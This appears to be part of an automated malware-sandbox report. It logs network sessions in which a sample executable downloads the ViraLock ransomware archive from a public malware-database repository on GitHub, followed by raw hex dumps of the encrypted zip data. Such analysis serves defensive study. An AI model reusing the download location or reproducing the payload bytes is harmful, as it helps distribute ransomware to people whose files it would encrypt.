                                                                                                        2022-09-29 12:45:35 UTC3977INData Raw: c1 98 72 a6 70 62 59 62 0b 73 0c 91 06 d0 07 bd 70 bf 98 c0 3d e2 a0 00 b4 b1 d4 89 2c 6c a6 63 f5 ba 1e a3 a2 2b a7 6a c1 be 12 ab 49 4b a0 e5 6f c3 eb 6b e0 a8 16 1b 33 6b 7f 6d 29 45 b8 7a 25 26 f8 c0 89 1f 98 8d 32 e8 29 b0 ca 72 26 73 6f 6a 23 2c d6 5e c2 6a 1b 3f 25 f5 52 bb ba ec b6 26 9a 25 1d 31 ba b7 c3 ec c9 66 6a 15 6a 83 82 4c b2 0c 4b b0 32 21 c5 3c 8a cc 00 f1 08 cc 3c cc 8c b3 26 23 20 b5 c0 77 06 0b 1e b5 28 67 6f d7 ce 2a 7a 8c 46 a7 79 36 d8 5d c7 1c 4f 9e b4 16 16 cc 0e ee df b7 5f ae f5 83 42 b8 d5 9e d4 9c 6d af 94 56 08 a4 6e 4f 65 bf f9 9e 31 a3 1e 1c 19 1d 8d da 2b 61 62 d5 57 5d c9 a7 04 30 62 94 1d 32 37 83 9c d7 e9 ae 66 ef b7 91 23 c5 8c 10 01 be da 96 2f 57 08 92 cd a2 9d 94 bb d9 c1 89 8b 8e ae 1f 62 f4 dc d4 a3 dc b6 44 8b
                                                                                                        Data Ascii: rpbYbsp=,lc+jIKok3km)Ez%&2)r&soj#,^j?%R&%1fjjLK2!<<&# w(go*zFy6]O_BmVnOe1+abW]0b27f#/WbD


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.449756140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:43 UTC3984OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:43 UTC3984INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:43 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:43 UTC3985INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.449757185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:43 UTC3987OUTGET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:43 UTC3987INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 135339
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "2bb1943793128dcdbc238f30e0779c2b1525b546f66d38117659df251eb89cab"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0866:0543:E4C3D7:F301C9:6335934A
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:43 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6980-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455544.803039,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 13d88047b7a024fa2a67f13e15b632fd5ca6000c
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:43 GMT
                                                                                                        Source-Age: 45
                                                                                                        2022-09-29 12:45:43 UTC3988INData Raw: 50 4b 03 04 33 00 01 00 63 00 0f 37 79 45 00 00 00 00 e1 0f 02 00 00 0a 03 00 17 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 69 72 61 4c 6f 63 6b 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 ed 91 64 e0 a1 85 e8 a0 cb 45 4a 4b c9 6b 96 10 99 81 2b 1d 24 3f e8 58 3b ea ca db e6 a4 67 1e 00 e6 fb 80 0f 17 9c a3 3e dc 6a 4f b1 b5 79 ab 70 3a f8 64 1e 80 04 fd 7e c9 a6 7f a7 8a ef 2e 9b 59 cf 79 88 93 ad eb 12 51 f7 b1 0b a9 8e 69 79 e7 f5 b5 5c 8d f8 f4 8e 7d ed ba 1d bb 09 e9 56 19 73 4c 01 8e 40 74 d0 0f f6 3c fe 84 b8 c1 61 75 90 6c 3d 69 a8 71 d5 f5 77 9d c7 2a dd 12 60 a5 7f 68 fe 61 bd b2 eb dd 1d c8 ea 09 9f 33 5c c7 30 80 6f 78 93 69 b5 0f e7 43 98 b4 66 ee 98 8f 3d 7f 45 8d ff f2 1f e4 3e f7 f0 41 99 10 92 0f 32 d0 58 da 23 e0 71 6d 6c 3e dc 81 d2
                                                                                                        Data Ascii: PK3c7yEEndermanch@ViraLock.exeAEdEJKk+$?X;g>jOyp:d~.YyQiy\}VsL@t<aul=iqw*`ha3\0oxiCf=E>A2X#qml>
                                                                                                        2022-09-29 12:45:43 UTC3989INData Raw: 56 99 97 ec dd bd c9 a3 1c 46 69 0b 2b 24 34 4e 0b 95 8d 76 2d 58 38 52 4f 20 39 99 6d 2a fe d0 2e b8 42 ae f9 10 88 74 73 e5 7e c0 cc 2b a4 98 19 69 f7 64 22 43 e6 74 04 9d 46 ee 4a 82 66 48 db 27 b3 d0 4e 61 71 84 d2 65 98 de f7 5d 9d d9 8c ba 63 f1 e8 c7 4f 45 f6 c1 a4 7d 68 bb 12 3d 5f 27 98 42 fa b8 56 e6 21 f2 41 3d ad 36 6b 59 db b9 60 ff 46 c9 41 42 bf df 11 72 49 30 c1 60 14 20 e8 d5 84 09 05 16 4f ec 06 24 80 86 3b 09 e5 7e 5a 08 0e 5b 76 48 8a 81 ba d0 f0 1c 0f d6 41 87 a9 d9 72 5d ad 99 8b cb 5f e0 05 9d 9c a2 54 df 32 a0 18 45 61 40 e4 c2 a5 1d 6e 77 72 79 19 39 e0 d8 99 17 54 8f 59 02 5b 4f 4e 23 68 38 6c 26 bd e8 97 be 3b a6 67 d5 5b 6a d7 81 45 31 54 6e 37 ea 4e f3 94 f9 36 f7 d5 a1 a7 f6 2f e6 77 08 ff 66 3d 3f b3 f9 8f d6 8d 7f bc ce cf
                                                                                                        Data Ascii: VFi+$4Nv-X8RO 9m*.Bts~+id"CtFJfH'Naqe]cOE}h=_'BV!A=6kY`FABrI0` O$;~Z[vHAr]_T2Ea@nwry9TY[ON#h8l&;g[jE1Tn7N6/wf=?
                                                                                                        2022-09-29 12:45:43 UTC3990INData Raw: f5 73 f7 5c 0a cf 7b f3 16 2b 3a ca 21 e5 d8 44 4d 88 72 d9 39 ef 8c 05 81 05 d0 b8 b8 70 fc 06 3f a1 66 dd 29 a5 e0 e5 ba d0 89 55 f1 a0 52 87 db 6d ef 02 c1 ab ae 21 fd e6 b6 3e b5 44 30 3b 1a 8e c7 11 7d b8 81 c2 99 2f 5a 35 40 27 51 3b da e6 23 68 49 2d fd 4d 8e 28 66 31 51 f2 31 71 84 89 1c 12 69 99 41 c2 54 69 52 75 ad e1 f2 4d d7 22 25 7a f5 2d 4b e3 35 d0 89 fe 11 eb 7a b3 3e 0f f5 08 85 55 ed e0 ec 23 ab e3 d5 25 ce 18 e6 f3 ae fb 59 25 c3 4d 50 61 b8 7a 3b 59 58 f6 26 6b f0 2c bf c1 cb 44 25 93 e1 87 7e 17 ad 8f 2c fd 51 14 22 7f dd 65 5c 48 cc 50 73 0e da 12 ca 38 78 0e bb de 2a 2f 3b b1 1f ba 3f 2a f8 a7 5d 74 7e e0 f1 43 a4 f8 81 67 92 4a d6 f4 53 67 b8 07 ba e6 10 ef 45 cc 7a db f2 72 ed fb b7 f9 fd 0c 25 9d 33 94 81 7b 81 d5 39 9d f9 06 78
                                                                                                        Data Ascii: s\{+:!DMr9p?f)URm!>D0;}/Z5@'Q;#hI-M(f1Q1qiATiRuM"%z-K5z>U#%Y%MPaz;YX&k,D%~,Q"e\HPs8x*/;?*]t~CgJSgEzr%3{9x
                                                                                                        2022-09-29 12:45:43 UTC3992INData Raw: a9 4a 12 99 f3 8a cb b7 28 6e 50 53 e4 11 5f 97 cc da b7 72 1a d5 8a 6a 7a 06 ac 26 7c 38 6e da 6b 81 ee a4 5d 7d b9 8f 22 0e 32 0e 0c 36 7a 72 bc a6 8a 22 4e de 4f 02 d4 31 61 57 64 4c 4e a3 8b 1e 1e 5e ae 58 9a 5f 6e 7f 57 77 5b 77 5a 83 9f ba ed 15 c0 45 23 4b 32 9e 7f 5d 61 b7 ac 02 5c d2 a2 8d 38 6e 67 f8 81 6d cc b9 d7 a3 08 a2 28 7f b9 32 c7 4d 90 00 b5 46 1e 92 10 74 ee ea f7 d2 e0 b4 96 50 e2 f9 a5 8a c2 83 6c b9 d9 82 06 97 b5 2d 74 1a 5d 38 f4 f8 40 d5 77 4c 2b 6c be 2a e9 58 a0 a5 a8 73 10 09 52 e2 8f e6 e9 d1 d0 eb 37 59 66 56 73 57 c4 08 64 c7 0b c7 2a 4f 3b 38 2f 56 2d ab fc 23 6c 69 38 83 7b 66 d1 9b a9 61 79 65 1b 8d 80 0f 48 27 0d 20 55 da c1 84 9f 41 1a 06 17 13 10 47 ce 44 30 5a 89 be 1c 70 d9 52 44 62 6d ae a7 f9 88 c8 a5 84 e8 d1 0b
                                                                                                        Data Ascii: J(nPS_rjz&|8nk]}"26zr"NO1aWdLN^X_nWw[wZE#K2]a\8ngm(2MFtPl-t]8@wL+l*XsR7YfVsWd*O;8/V-#li8{fayeH' UAGD0ZpRDbm
                                                                                                        2022-09-29 12:45:43 UTC3993INData Raw: 4f d7 0a 1b 04 ac 66 0d c3 85 da 2a eb 77 91 f3 ed f7 69 36 47 c1 be 9d d1 94 34 8c a3 a1 8b f5 c8 14 aa 5d c7 5b 5e f8 2f 16 1b ea 66 fa d6 17 5d d3 f4 29 09 b2 17 58 de 34 ab 64 49 6a d4 7f 36 a9 8e bf 21 1d 6e 32 a6 72 9a ae ee 95 5e 4a 7e fa 43 43 fa ca ab 2f 18 03 83 db bc ac 67 3e e6 b6 67 4d 20 d9 d9 3d e2 48 c3 e6 dc 59 6e f0 53 93 43 d0 f4 fe 25 04 76 55 69 88 11 ea 1d 1a a6 b5 50 32 bc 7f 26 58 29 66 ae b6 23 b9 f9 d4 20 6c 4f ed 06 0c 55 70 4b d1 a4 93 06 52 d3 25 c2 8b df 82 03 62 c7 a7 48 3d 65 cd 19 49 0d d7 4f cc f8 6e 9f 4e 22 a1 d6 a7 fd ff 63 f6 05 72 9d f5 20 55 ae a9 57 c1 f8 b8 5c 39 25 2a da 4e b5 c0 93 b6 cd f4 6b 7f 73 cd 39 00 dd c3 4f 24 6a 8d 82 f9 e1 e1 46 52 59 9f 3d d1 a1 47 ee f6 13 d8 bf 99 7b 62 f0 c2 ee a3 c3 88 a5 96 15
                                                                                                        Data Ascii: Of*wi6G4][^/f])X4dIj6!n2r^J~CC/g>gM =HYnSC%vUiP2&X)f# lOUpKR%bH=eIOnN"cr UW\9%*Nks9O$jFRY=G{b
                                                                                                        2022-09-29 12:45:43 UTC3994INData Raw: b1 b7 0d a1 61 43 b3 3c 2e a4 3c 30 97 9d a3 a2 7d 91 39 d1 27 75 43 96 47 5c 9b 94 47 c7 cf b2 f5 86 e8 63 e2 4c 1d af 4a 88 a5 23 82 12 c1 05 f4 d6 5b 51 88 c1 ea 55 13 f3 1d 18 bd 6e 2d ce dc 2a 98 03 0d cf 06 f9 de 9c 5d 8b 7d fe 23 20 86 a6 e5 ff 27 a7 76 75 90 10 c3 86 a8 23 20 9f d2 90 de 20 2a d5 6e e4 a0 79 cf 44 db 71 23 7c b7 98 3f 26 a1 92 41 42 6c cb 1b ed b5 ec 4b 28 14 62 35 97 c8 00 96 e3 2b 62 a9 a0 88 f3 b7 a3 f5 5c e4 f3 8f 6a 5e 8e 33 32 64 47 a2 e7 6f b8 ae 65 16 29 f2 df 79 ce d3 fe 0a 86 67 5d 04 de 70 c4 64 ec 40 bb c6 c1 1d 0e 01 d9 50 d1 4c d5 c3 20 19 63 45 31 06 96 5a 71 58 82 a4 81 ce 3a 6d e2 1b 10 eb 96 f0 78 65 df 8e fc 19 28 15 07 13 cb 38 67 7e 53 19 6e 63 9b cd ce ea de 0e 8b a2 46 55 10 38 77 ec 9c 29 c1 26 37 c9 7f 1e
                                                                                                        Data Ascii: aC<.<0}9'uCG\GcLJ#[QUn-*]}# 'vu# *nyDq#|?&ABlK(b5+b\j^32dGoe)yg]pd@PL cE1ZqX:mxe(8g~SncFU8w)&7
                                                                                                        2022-09-29 12:45:43 UTC3996INData Raw: 27 24 03 14 58 3a d2 bd c3 99 3f ae 30 8f 8c e2 54 75 ff 76 74 c6 fa 9c 05 49 bc fe b4 15 13 25 3a 5d 8c 4a e2 77 2f a1 e0 72 76 77 58 df 21 9a a7 99 1d f4 b8 be 3c 43 1d d0 2f cc fd 3e 34 d3 fc 2f 05 b2 e6 5e 3d 6e 18 7d 4d 8e 98 19 aa b3 42 80 b8 22 2c cb d7 82 a2 3d 41 e0 96 19 fa 90 8e 91 56 bb 3c b4 24 65 87 2e a7 3d 6e 25 9d 57 e7 4b 7e 68 be 8a 3c a0 4b 61 62 2a ea 10 d5 e2 03 60 d5 9a c3 36 fd 74 05 6c bd 23 a8 39 2c 78 5b 01 c2 74 db 03 78 26 34 1d b8 ad 34 7d 1c 92 10 8c 1b 96 f5 04 4c f5 4f 51 c8 19 78 47 8c 29 ff 88 cb ee 67 87 fd 4c a8 58 f5 5c 7d 14 24 cc 8a 79 ee a7 aa a0 31 a0 56 a3 c1 5c 26 64 7a 82 86 d8 dd 24 66 55 8f 4d dd ac fb 12 67 9f ca ac f5 52 7d 40 c7 a7 ab d5 26 98 77 e6 c4 ef 5d b7 36 83 8e 4c 1c 6e 4f b3 80 e8 9e 26 74 8a 2a
                                                                                                        Data Ascii: '$X:?0TuvtI%:]Jw/rvwX!<C/>4/^=n}MB",=AV<$e.=n%WK~h<Kab*`6tl#9,x[tx&44}LOQxG)gLX\}$y1V\&dz$fUMgR}@&w]6LnO&t*
                                                                                                        2022-09-29 12:45:43 UTC3997INData Raw: 08 4d 6b b0 06 1c 14 79 60 fe cc 58 9a 14 9c 55 df fa fb 33 18 96 e2 0d 76 d1 bd f5 01 9a 6f 0f a0 18 c8 f9 48 63 c1 ad 20 5f 3e 10 b9 34 cb d6 b4 55 64 e0 c2 4d 58 83 81 6b b5 7d d7 26 b7 1a a8 4d 79 49 3f c1 8a 59 a4 7d 61 9d 13 53 46 dc 7e 82 bb cc 25 9f 82 a0 3c ba 71 e2 ad 43 30 cf f3 7c d0 8f 38 ae b3 e6 24 47 6d e6 99 92 33 68 a3 9c db 6a f3 24 96 f7 76 5a 48 7e 06 be 7f dd 93 e1 98 78 c4 bf 03 0b 99 bf 8b 3b dd 7e 5a 98 58 ef 28 a2 5c e3 87 1d ea 2e fe 9d 64 b3 54 30 83 b4 40 24 7b 15 75 c3 52 f5 e0 fc b2 19 6f e2 46 60 e8 73 04 01 03 f9 6f 4d 47 3d d1 42 18 62 94 e5 5a ec 2f db d2 68 4f f6 17 3e b2 cf 69 64 9e f2 ec 43 85 12 e2 8c d6 fb 32 71 42 4b 1f 6e 49 bb 30 8f 7a 9c 63 b7 3d 1f 23 32 a0 e2 b3 a4 71 1d 9b 75 b0 b8 ca 68 25 7c d5 30 27 40 ad
                                                                                                        Data Ascii: Mky`XU3voHc _>4UdMXk}&MyI?Y}aSF~%<qC0|8$Gm3hj$vZH~x;~ZX(\.dT0@${uRoF`soMG=BbZ/hO>idC2qBKnI0zc=#2quh%|0'@
                                                                                                        2022-09-29 12:45:43 UTC3998INData Raw: a0 65 ae 1f 8e da 70 24 61 b8 7f d4 a7 65 2b e8 00 76 75 02 3e c7 24 b1 3e 2e 86 13 c6 27 4e ca 57 bc 6b c9 6f e7 6f 0b 5d e9 b5 06 c2 4d 31 6a a1 85 4b 31 7f 00 27 ec 30 69 16 92 3b dd 26 b0 d2 9a 37 11 85 82 2c 4c 3d 52 00 00 24 48 a8 df f6 39 47 5c 7c f6 14 ea da c1 45 fa 09 57 53 0d 93 20 81 63 92 68 5d 78 6d 08 81 00 ef 87 3a bf eb a6 94 20 d2 04 8c 12 a2 8f ee a7 0c 80 1c 38 33 97 c5 c2 37 d3 88 34 1c 43 81 56 76 97 6e 46 e7 02 03 18 1b 5b 02 ec 75 92 82 8c ba 5e 91 a7 b7 4b 2e ae 84 9b b2 c5 7e b0 cd 1f e1 a1 98 69 1c 47 b9 70 4e ef a8 5b 84 fb fc 30 17 3d 95 5e 72 4c 59 32 1f 26 50 41 4f 62 8a ab db 28 94 72 28 87 9d 6d 73 b9 5c a7 fc d8 ba a8 33 bb 53 18 3d 5d 80 91 7e 91 3a 62 a5 ca d0 89 92 7e fa 7d e7 be e0 43 8e 1c 41 a3 f9 4f 80 6c cd 9b da
                                                                                                        Data Ascii: ep$ae+vu>$>.'NWkoo]M1jK1'0i;&7,L=R$H9G\|EWS ch]xm: 8374CVvnF[u^K.~iGpN[0=^rLY2&PAOb(r(ms\3S=]~:b~}CAOl
                                                                                                        2022-09-29 12:45:43 UTC4000INData Raw: e2 2b 94 38 7c 73 9d 10 17 69 09 fc c0 91 07 1b 70 8e f9 3a 5e 3c 29 20 37 0c e5 26 70 31 9a 4f 96 b0 33 e9 8b cf b2 4d b9 23 2b 77 ed 3f b9 14 7d 27 4c 53 61 95 68 96 30 23 b7 18 ef 90 55 7e fc 57 d2 7e 60 60 25 3c 2a 08 c5 8e 3f 7e 11 2b 43 77 28 78 b2 c6 b7 19 99 c0 59 4e de ce 8d 82 2b 3f 92 ec c8 f8 f5 96 af f8 f9 00 5c 6d b5 96 2e ce 26 29 24 e9 c1 6b 69 d1 5a 41 70 21 cb f5 44 46 a3 ac 81 30 26 8e a8 75 cb 02 c6 f8 51 0e 7b 17 39 55 d8 4b ed 1c 26 ec 2f be 87 4b 55 89 27 a6 9f 5e 1c 10 52 b0 77 d9 6b 80 96 29 13 00 79 48 57 4e 6b 13 63 43 a4 2e c2 31 c7 23 09 cd 05 cb 55 31 c7 a2 c7 8e b9 ba 1d 86 a2 5d 43 4e a7 d8 e0 d6 d1 2a 36 73 cc 42 aa e6 e7 78 55 bc bf ca 0b 76 a9 e8 89 1b 83 9f de 36 10 2b 57 55 08 46 87 d4 b3 a9 7f a9 67 68 a1 4f 33 a7 ed
                                                                                                        Data Ascii: +8|sip:^<) 7&p1O3M#+w?}'LSah0#U~W~``%<*?~+Cw(xYN+?\m.&)$kiZAp!DF0&uQ{9UK&/KU'^Rwk)yHWNkcC.1#U1]CN*6sBxUv6+WUFghO3
                                                                                                        2022-09-29 12:45:43 UTC4001INData Raw: 5a 58 c2 37 e0 5d 4c 0f 17 ae 63 58 14 e2 5a 5f 1d 65 a3 0a 0c 42 a1 c8 49 6f 11 b5 3f 7e 04 01 a8 50 18 7c 2a 3f 6c 7f 10 2d 90 3b bc 63 7a 87 16 e9 da 0b ce a5 2c bf 7a 90 b3 76 08 ca cf fe f3 e6 f6 4a 05 3d 97 21 cc 9a e2 da e6 81 c4 2c cb 86 ec 37 46 6a 0c 10 4a 0f 02 3d ba 80 d3 3e d0 a6 34 71 bd 6a a6 ae f5 13 b3 19 9f 00 3b bc fc ed 1f c7 75 99 25 41 5c 3a d4 98 88 dc df 1f ca d0 60 13 88 f2 bb 98 f8 5e 05 d2 4a d5 49 57 d7 c0 3e cc 72 9f 38 37 3a ce d3 ce 71 91 35 3b 59 dd 07 41 20 c7 dd 69 ef 95 eb e9 48 b5 33 46 49 d7 e8 9a b0 ed f2 b7 7e b8 b6 8d b2 38 ca fd 04 a3 88 38 e4 b2 11 aa 95 a9 e3 ca 38 5d 35 41 fd e8 a0 18 e3 41 7a 0f f8 b1 e1 44 b9 3a 42 96 26 49 6c e6 c8 4b fd 5c 1a 2a ec 9a d3 04 cb fd 44 42 51 75 42 d1 07 26 d0 ce c7 3e 03 cd f7
                                                                                                        Data Ascii: ZX7]LcXZ_eBIo?~P|*?l-;cz,zvJ=!,7FjJ=>4qj;u%A\:`^JIW>r87:q5;YA iH3FI~888]5AAzD:B&IlK\*DBQuB&>
                                                                                                        2022-09-29 12:45:43 UTC4002INData Raw: 30 68 d1 4d 94 cc 33 41 8c 0a 6d 02 99 c1 b0 2e 8a 54 3c f5 68 86 59 9d a8 0b c5 d9 ad ce d8 c4 b4 f2 be b4 51 db 07 54 6a 90 a0 fe 3f f5 f3 6f e8 41 3b a7 ec ea 7d 54 86 bc 84 75 9e 24 a7 62 f8 ac c6 20 9b 86 5e 1d 35 4d 47 d7 7b f9 ca d1 ef 02 d0 22 d6 d1 1e 2c 91 8a 1b 49 52 ae cf 01 77 9b e4 26 b2 81 de 27 c1 6e 91 e6 2e 19 e9 5e 2c c2 94 6a a8 a2 a8 16 26 a9 da 2d 54 f3 95 be 76 ce a0 8d 42 ac 8f 35 5d 15 3a d7 e2 7f aa 61 3e 84 87 a7 6f ae 82 d2 f7 b3 24 e8 33 f4 22 a7 37 e5 2c 15 03 cf 3a 36 41 ac a3 1c e3 09 87 3a 2a 69 c9 29 6d d4 47 ab 0b fe dd 2d 01 dd f2 35 20 e6 d7 f3 f9 c6 87 b4 4c 82 67 59 c8 08 e5 ce 05 6a 2e 0f bc 4a 51 07 78 58 3c 7f c2 99 1f 84 3d 81 92 1c 19 67 86 18 14 ab 67 83 36 28 e9 3a 7e 16 4f a7 c4 6c 3a ea d8 e9 f3 07 98 2f c0
                                                                                                        Data Ascii: 0hM3Am.T<hYQTj?oA;}Tu$b ^5MG{",IRw&'n.^,j&-TvB5]:a>o$3"7,:6A:*i)mG-5 LgYj.JQxX<=gg6(:~Ol:/
                                                                                                        2022-09-29 12:45:43 UTC4003INData Raw: f7 ca 32 ea 27 d2 bc 1e e4 9c ab 11 4a c7 57 d1 70 59 36 ff 67 21 93 81 d6 7a b6 03 15 bb 16 43 bb de 04 21 de 05 49 24 df d7 f7 c5 f3 73 0b b1 5e 57 76 7b e4 48 0a ec 53 18 24 51 09 ea b5 71 b0 7e 7e d9 74 7f 0c 74 45 11 87 de 68 d2 45 1a dd 9c 76 74 35 4c ad 89 ca a8 de cc a6 75 e5 3a 05 6c c9 67 7a 76 a6 83 17 89 c5 32 62 ad b6 c5 d5 3a c8 96 2c 45 c5 b6 29 98 8a 06 35 c9 4d c9 ca ff 73 81 6e e4 5c 72 cb 1a 9c ce 22 ba ec a7 bd 92 f7 41 40 1f eb 9f d2 3f 96 88 47 91 a2 f0 4e cc 49 d4 d8 53 75 fa 70 e8 6a 94 12 f4 6e 22 8a cc 5f 54 68 62 d1 41 2d 49 59 5a ce ea 6d 60 e0 6c cf 4c d5 9f e6 09 29 fa 5c f0 38 28 79 5c ea f5 b0 9b d1 bc 39 7b 17 b8 c5 2f b1 14 c4 37 52 ab 2b 62 3b 75 d1 c5 7f 64 a5 06 36 da e2 b7 fe c1 4e 0c 6c b0 e0 d0 7a 5f 5e 02 df 71 d1
                                                                                                        Data Ascii: 2'JWpY6g!zC!I$s^Wv{HS$Qq~~ttEhEvt5Lu:lgzv2b:,E)5Msn\r"A@?GNISupjn"_ThbA-IYZm`lL)\8(y\9{/7R+b;ud6Nlz_^q
                                                                                                        2022-09-29 12:45:43 UTC4019INData Raw: c6 57 03 d1 c3 93 8a f2 87 7f 02 7b c5 69 70 91 47 c3 d2 ba 5a 14 88 0c 97 61 07 a8 b9 46 fb 52 bb 40 05 8e 68 68 5e 6c 0b f2 f3 6c 76 9b 96 41 76 39 05 c1 ef 73 09 52 57 7e 2d 9e bf 8f 6e 5a 18 1e d1 47 d6 0b 18 3c d6 6c 8d 78 94 cc 7e 78 e4 60 58 9a f2 8c d1 be ff 81 07 81 1d 64 f0 29 98 e0 bd fc c9 d3 df 2e 9e 6a 9c fb c9 86 71 31 05 6a 46 b6 b6 3f f5 72 60 ee d0 9f 15 3f c5 27 7e 69 42 22 5a f7 7e 4b 1c da 54 12 ba 2f 5d a3 ab 48 45 80 d0 2d 86 d2 08 c2 e6 20 20 8a 73 31 d6 83 bd d7 9f d2 f9 2c 3e 92 25 c6 d2 29 65 11 03 18 5e 3c ff 0d 9e 79 61 0f 81 05 50 dc 1e 0d b7 c1 80 58 3e ee 1c 41 ee b5 8a e8 e0 02 e9 dd 12 1d ed c2 cd ea fe 2c 61 6e 52 ca 26 e5 66 95 41 4a 01 7f 9c eb f7 ec 6a fa 92 b1 9c 33 16 44 72 94 42 15 25 25 a9 07 b0 04 61 da c0 c3 55
                                                                                                        Data Ascii: W{ipGZaFR@hh^llvAv9sRW~-nZG<lx~x`Xd).jq1jF?r`?'~iB"Z~KT/]HE- s1,>%)e^<yaPX>A,anR&fAJj3DrB%%aU
                                                                                                        2022-09-29 12:45:43 UTC4035INData Raw: 12 c9 20 11 d2 1c a4 da fd 18 4b 97 f9 9f 60 e9 8e 2b 34 ac f6 df 7d 71 99 78 54 4e 4c cc 69 bb c6 49 c4 79 68 ec bc b4 d8 78 71 70 17 af 5b 72 7e 9a 54 d4 a4 4f a4 10 46 8b 30 10 5d 24 94 c7 73 f3 d1 21 11 62 5c fe a0 3a b9 82 f6 6e 49 13 f7 84 d4 76 30 90 00 89 30 31 98 fb bb b1 49 2a 64 2e 90 2a e4 bb b0 50 4a f2 d3 9f e0 78 f0 91 48 79 21 86 87 8b 4e 13 eb c5 9c c1 07 26 b2 25 c7 95 1f b4 9e 6d 18 6e 73 25 56 d5 aa 29 a9 99 ef d8 40 83 86 0c aa a2 c8 63 73 c8 7f d3 b3 c3 05 2b e7 f9 55 2b af 35 44 03 39 82 49 5c 62 e4 ce 51 98 1a d4 bc 47 e2 36 2b fd 92 96 26 58 40 4d 51 67 0c 0e 7a b1 c2 64 09 37 70 96 4a 8f 61 c0 7b ae 93 24 94 7b 3a 2e ba ab 15 47 be 3d 1e 83 73 5a 8e 6a eb 41 65 5a 2c c5 08 49 57 d7 12 78 13 99 e0 d7 be 9f 60 e7 68 78 5c 3c 39 7d
                                                                                                        Data Ascii: K`+4}qxTNLiIyhxqp[r~TOF0]$s!b\:nIv001I*d.*PJxHy!N&%mns%V)@cs+U+5D9I\bQG6+&X@MQgzd7pJa{${:.G=sZjAeZ,IWx`hx\<9}
